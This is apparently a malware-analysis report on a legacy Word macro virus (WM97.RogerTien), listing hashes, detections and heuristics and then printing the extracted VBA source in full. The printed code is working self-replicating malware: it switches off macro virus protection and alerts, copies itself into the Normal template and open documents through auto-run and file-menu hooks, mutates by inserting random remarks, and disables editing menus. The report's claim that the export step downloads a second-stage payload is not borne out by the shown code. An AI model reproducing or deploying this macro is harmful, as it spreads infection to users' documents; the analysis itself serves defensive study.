Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 c9608408df86e3e2…

MALICIOUS

Office (OLE)

42.0 KB Created: 1999-10-04 03:00:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9bd145c4fc503036feaf7ff00de56a9e SHA-1: 9be6d1066895a0ece9b45e4ec98bf49cac0e9eb2 SHA-256: c9608408df86e3e217ff4c2400befdee04115ed9d637f9065797cd4336c89402
200 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macros, specifically an AutoOpen macro, which is a strong indicator of malicious intent. The script attempts to disable macro security features and export a file named 'RogerTien.sys' to the C:\ drive, likely to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics 4

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4681 bytes
SHA-256: 1964cf9809fd7884e06528b4b3f63c1d0191253299ff7b586ac4b3f70eabb5dc
Detection
ClamAV: Doc.Trojan.Agnes-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "RogerTien"
Sub AzCpMx5511()
' -= [WM97.RogerTien] =-
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
s.VirusProtection = False
End With
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("RogerTien").CodeModule.ProcCountLines("AzCpMx5511", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("RogerTien").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
Call OfKoPl759
End Sub
Sub OfKoPl759()
On Error Resume Next
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
End Sub
Sub Th1874()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("RogerTien").Export "C:\RogerTien.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.RogerTien" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 12094-Th-18745511-Hr.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "RogerTien" Then BmPkMr3950RnEuGe1874 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "RogerTien" Then CfAnHh759AzCpMx5511 = True
Next y
If BmPkMr3950RnEuGe1874 = True And CfAnHh759AzCpMx5511 = False Then Set NnPjVy8904OfKoPl148 = ActiveDocument.VBProject
If BmPkMr3950RnEuGe1874 = False And CfAnHh759AzCpMx5511 = True Then Set NnPjVy8904OfKoPl148 = NormalTemplate.VBProject
If BmPkMr3950RnEuGe1874 = True And CfAnHh759AzCpMx5511 = True Then GoTo Ende_
NnPjVy8904OfKoPl148.VBComponents.Import "C:\RogerTien.sys"
If CfAnHh759AzCpMx5511 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If BmPkMr3950RnEuGe1874 = False Then NormalTemplate.Save
Ende_:
Call AzCpMx5511
End Sub
Sub AutoOpen()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoExit()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoNew()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoExec()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiNeu()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiOffnen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiSchliesen()
On Error Resume Next
Call Th1874
Call AzCpMx5511
WordBasic.FileClose dlg
End Sub
Sub DateiSpeichern()
On Error Resume Next
Call Th1874
Call AzCpMx5511
ActiveDocument.Save
End Sub
Sub DateiSpeichernUnter()
On Error Resume Next
Call Th1874
Call AzCpMx5511
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub DateiDrucken()
On Error Resume Next
Call Th1874
Call AzCpMx5511
Dialogs(wdDialogFilePrint).Show
End Sub
... (truncated)